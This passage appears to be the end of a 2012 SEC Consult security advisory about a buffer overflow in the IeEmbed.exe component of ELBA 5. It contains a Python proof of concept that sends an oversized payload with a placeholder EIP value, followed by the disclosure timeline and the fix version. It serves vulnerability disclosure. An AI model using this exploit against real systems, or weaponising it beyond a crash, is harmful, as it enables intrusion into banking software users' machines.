0,6,http://localhost0,6,foo=bar0,6,AAAAAAAAAAAA...{A x 4096}...AAAAAAAA
A harmless proof of concept code (Python (2.x) is required) is provided below.
Running it will result in a crash of the component IeEmbed.exe. Crash details
can be analyzed using a debugger.
import socket
import sys
EIP='\xaa\xaa\xaa\xaa'
def socket_read(sock):
data = ''
sock.settimeout(1)
while True:
try:
buff = sock.recv(1024)
except socket.timeout:
break
data += buff
if not buff: break
return data
if __name__ == '__main__':
if len(sys.argv) != 3:
print "Usage: ./%s
" % sys.argv[0]
sys.exit(1)
host, port = sys.argv[1:]
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, int(port)))
print '\n- Searching for the window handle\n'
for i in xrange(65552,70000):
pkt='0,1,%s
' % i
print 'Sending data (to %s:%i):\n%s' % (host, int(port), repr(pkt))
s.send(pkt)
data=socket_read(s)
if data:
print '\n- Sendind exploit payload\n'
pkt='0,6,http://localhost0,6,foo=bar0,6,' + 'A' * 2087 + EIP + '
'
print 'Sending data (to %s:%i):\n%s' % (host, int(port), repr(pkt))
s.send(pkt)
s.close()
break
sys.exit(1)
Vulnerable / tested versions:
-----------------------------
5.5.0 R00006 build 0796
Vendor contact timeline:
------------------------
2012-09-04: Contacting vendor through software () racon-linz at
2012-09-04: Vendor response: Issues will be investigated.
2012-09-25: Vendor response: New release with fixes will be published on 03.12.2012
2012-11-26: Vendor response: Release rescheduled to 17.12.2012
2012-12-20: Public disclosure of advisory
Solution:
---------
Upgrade to ELBA 5 5.6.0 R3
Workaround:
-----------
None
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
https://www.sec-consult.com
EOF K. Gudinavicius / @2012
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information